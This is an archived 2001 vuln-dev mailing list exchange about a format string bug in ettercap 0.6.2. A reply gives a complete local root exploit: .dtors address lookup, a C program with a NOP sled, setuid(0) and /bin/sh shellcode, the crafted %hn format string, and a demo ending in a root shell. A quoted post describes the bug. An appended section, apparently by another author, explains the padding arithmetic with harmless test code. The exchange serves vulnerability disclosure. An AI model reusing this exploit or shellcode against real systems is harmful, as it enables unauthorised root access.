Firstly, let's retrieve the address of the section .dtors:

cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap

/usr/local/sbin/ettercap:     file format elf32-i386

Contents of section .dtors:
 8119a70 ffffffff 00000000                    ........
cb@tshaw$

So the fmt string is composed of:

- "000" for alignment.
- "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
  expect to write (here .dtors + 4 -- 0x8119a74.)
- "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.

This format string was built using fmtbuilder:
http://minimum.inria.fr/~raynal/index.php3?page=501

---- ettercap-exp.c ----
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    /* 1024 bytes of NOP sled with the shellcode at the end, plus one
     * byte for the terminating NUL that setenv() needs. */
    char buf[1025];
    char shellcode[] =
        /* setuid(0) */
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        /* Aleph 1 shellcode */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    /* "000" pad, the two .dtors+4 halfword addresses, then the two
     * padded %x / %hn pairs that write the return address. */
    char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08"
                "%.49119x%16$hn%.16145x%15$hn";

    memset(buf, 0x90, 1024);
    memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode));
    buf[1024] = '\0';
    setenv("SHELLCODE", buf, 1);
    execl("/usr/local/sbin/ettercap", "ettercap", fmt, (char *)0);
    return 0;
}
---- ettercap-exp.c ----

Demo:

This demo is made with a suid root version.

cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
cb@tshaw$ ./ettercap-exp

ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...

may the packets be with you...


Invalid host address 000tv00000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
....snip....
0000000000000000000000000000000000000000000000081020c0 !!
sh-2.04# id
uid=0(root) groups=100(users)

Best regards,

--
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr

On Tue, 4 Dec 2001, Blue Boar wrote:

> Goobles sent another post to vuln-dev today, which was rejected due
> to personal attacks in their note. I want to check out their claim,
> however. If you want to see their original posting, it's on their
> web site like the others, I'm sure. It includes a claimed exploit,
> which cannot be posted due to their wishes that it not be separated
> from the advisory. If someone wants to write an independent exploit,
> I'd be happy to post that, provided it follows the list rules,
> of course.
>
> Here's the basic problem:
>
> ettercap %x%x%x%x%x%x%x
> ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
>
> may the packets be with you...
>
>
> Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
>
> Gobbles' point is that there is an option to configure it suid,
> so this could be exploitable when that is used. Why someone
> would want a packet capture program to be used by non-priv users..
> Well, I'm sure there's a good reason somewhere in the world.
>
> Is anyone using it that way? Are there OS distributions that come
> with Ettercap installed by default? And, of course, is it suid?
> (I can't imagine it would be.) The workaround is obvious, don't
> run it suid or allow remote users who do not already have a shell
> to execute it with a command-line parameter (such as via a web
> interface.)
>
> BB
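A worked example of the padding arithmetic behind "%.49119x%16$hn%.16145x%15$hn", added here; it is not part of the post above, of fmtbuilder or of ettercap. Each %hn stores the running character count (mod 65536) into a 16-bit slot, so with "000" plus two 4-byte addresses (11 characters) already printed, 11 + 49119 = 49130 = 0xbfea lands in the high halfword at .dtors+6 and 49130 + 16145 = 65275 = 0xfefb in the low halfword at .dtors+4; reading the post that way (arguments 15 and 16 being the first and second address) gives a return address of 0xbfeafefb, which is my inference, not a value the post states. The code below computes the two precisions for any target value and prefix length, including the wrap past 0x10000 that is needed when the second halfword is smaller than the first, and then performs the two short writes against a local variable with a constant format string so the result can be checked. The prefix strings and target values passed in are constructed for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Two %hn writes assemble one 32-bit value: the counter only grows, so the
 * numerically smaller halfword is written first, and a halfword that is
 * already below the current count is reached by letting the count wrap
 * past 0x10000 (%hn keeps count mod 2^16). */
typedef struct {
    int high_first;  /* 1: the high halfword is written by the first %hn */
    int pad_first;   /* precision of the first %x */
    int pad_second;  /* precision of the second %x */
} fmt_plan;

static fmt_plan plan_write32(uint32_t target, unsigned prefix_len)
{
    unsigned lo = target & 0xffffu, hi = target >> 16;
    unsigned first, second, count, want;
    fmt_plan p;

    p.high_first = hi < lo;
    first  = p.high_first ? hi : lo;
    second = p.high_first ? lo : hi;

    count = prefix_len;                      /* bytes printed before the first %x */
    want = first;
    while (want < count) want += 0x10000u;   /* wrap if we are already past it */
    p.pad_first = (int)(want - count);

    count = want;
    want = second;
    while (want < count) want += 0x10000u;
    p.pad_second = (int)(want - count);
    return p;
}

/* Perform the writes against a local 32-bit cell. The format is a string
 * literal (so it stays valid under _FORTIFY_SOURCE) and the %x fields print
 * the value 0, so each emits exactly 'precision' characters. 'prefix' stands
 * in for the "000" + 8 address bytes in front of the %x fields. */
static uint32_t do_write32(uint32_t target, const char *prefix)
{
    union halves { uint32_t u32; uint16_t u16[2]; } v = { .u32 = 0 }, probe = { .u32 = 1 };
    int lo_idx = (probe.u16[0] == 1) ? 0 : 1;   /* where the low halfword lives */
    short *lo = (short *)&v.u16[lo_idx];
    short *hi = (short *)&v.u16[1 - lo_idx];
    fmt_plan p = plan_write32(target, (unsigned)strlen(prefix));
    short *first  = p.high_first ? hi : lo;
    short *second = p.high_first ? lo : hi;
    size_t cap = strlen(prefix) + 2u * 0x10000u + 16;   /* worst case: two full wraps */
    char *out = malloc(cap);
    if (!out) abort();

    snprintf(out, cap, "%s%.*x%hn%.*x%hn",
             prefix, p.pad_first, 0u, first, p.pad_second, 0u, second);
    free(out);
    return v.u32;
}

int main(void)
{
    /* The post's own numbers: 11 characters already printed, target
     * 0xbfeafefb (derived from the two precisions, see the lead-in). */
    fmt_plan p = plan_write32(0xbfeafefbu, 11);
    printf("%%.%dx%%hn%%.%dx%%hn (high halfword first: %d)\n",
           p.pad_first, p.pad_second, p.high_first);
    printf("memory after the writes: 0x%08x\n",
           (unsigned)do_write32(0xbfeafefbu, "000AAAABBBB"));
    return 0;
}
```

For the post's target and an 11-byte prefix the plan comes out as 49119 and 16145 with the high halfword first, i.e. the same precisions as the posted format string. The real exploit prints stack garbage with %x rather than 0, which only works because the precision is far larger than the eight hex digits a 32-bit value can occupy; printing 0 here removes that dependency.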
This archive was generated by hypermail 2b30 : Wed Dec 05 2001 - 10:09:19 PST